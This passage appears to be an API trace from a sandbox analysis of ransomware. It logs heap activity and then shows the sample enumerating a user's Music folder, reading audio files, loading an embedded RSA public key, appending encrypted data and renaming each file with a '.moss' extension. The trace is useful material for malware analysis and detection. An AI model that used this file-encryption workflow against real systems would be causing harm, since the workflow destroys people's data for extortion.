hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.681] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\") returned="LV2X09A0oM561\\" [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.681] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4cb80 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.681] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cb80 | out: hHeap=0xcd0000) returned 1 [0171.681] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.681] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.681] PathFindFileNameW (pszPath="") returned="" [0171.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x10c570a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0x10c570a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.682] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x10c570a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0x10c570a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.682] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a983dd0, ftCreationTime.dwHighDateTime=0x1d5e70b, ftLastAccessTime.dwLowDateTime=0x5f069f70, ftLastAccessTime.dwHighDateTime=0x1d5df8d, ftLastWriteTime.dwLowDateTime=0x5f069f70, ftLastWriteTime.dwHighDateTime=0x1d5df8d, nFileSizeHigh=0x0, nFileSizeLow=0x16869, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrHO0.wav", cAlternateFileName="")) returned 1 [0171.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3280 [0171.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.682] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\GrHO0.wav") returned=".wav" [0171.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\GrHO0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\grho0.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.682] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=92265) returned 1 [0171.682] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.686] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x16843, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.686] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.687] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.687] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x16869, lpOverlapped=0x0) returned 1 [0171.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.688] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.689] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.689] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.689] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.689] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.689] GetLastError () returned 0x0 [0171.690] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.690] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.690] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.690] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.690] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x16870) returned 0x3b62d40 [0171.691] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4cb80 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4def0 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4cbc8 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df08 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df38 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4df50 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0171.691] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4df38 | out: hHeap=0xcd0000) returned 1 [0171.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4df50 | out: hHeap=0xcd0000) returned 1 [0171.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0171.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4df50 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4df38 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa26a0 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0171.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4df50 | out: hHeap=0xcd0000) returned 1 [0171.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4df38 | out: hHeap=0xcd0000) returned 1 [0171.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.693] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x16869, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.693] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.693] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\GrHO0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\grho0.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\GrHO0.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\grho0.wav.moss")) returned 1 [0171.696] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\RvIelPYu4g 0l9vjosa.mp3") returned=".mp3" [0171.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\RvIelPYu4g 0l9vjosa.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\rvielpyu4g 0l9vjosa.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.697] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=22329) returned 1 [0171.697] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.700] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5713, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.700] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.701] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.701] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5739, lpOverlapped=0x0) returned 1 [0171.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.702] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.702] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, 